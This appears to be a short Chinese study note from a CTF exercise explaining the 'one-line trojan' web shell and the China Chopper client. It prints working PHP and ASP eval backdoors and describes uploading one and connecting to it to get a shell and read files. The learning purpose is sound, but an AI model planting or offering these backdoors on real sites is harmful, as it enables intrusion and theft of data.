一句话木马和中国菜刀

看hbctf的一道题学习了一点,先记录下来。
首先需要可以上传(写入)文件 写入php文件或asp文件均可。
以php为例,新建文件后写下

<?php @eval($_POST['QAQ']);?> (@符号的意思是不报错)
顺便asp为<%eval request("QAQ")%>

“QAQ”相当于一个标记。eval是一个php函数
他将符合php语法的字符当做php代码进行执行
即一个后门

(怎么用hackbar的Post data写入文件还不会…以后回来改)

连接菜刀 输入网站 和当时标记
即可拿shell查看文件(flag)等等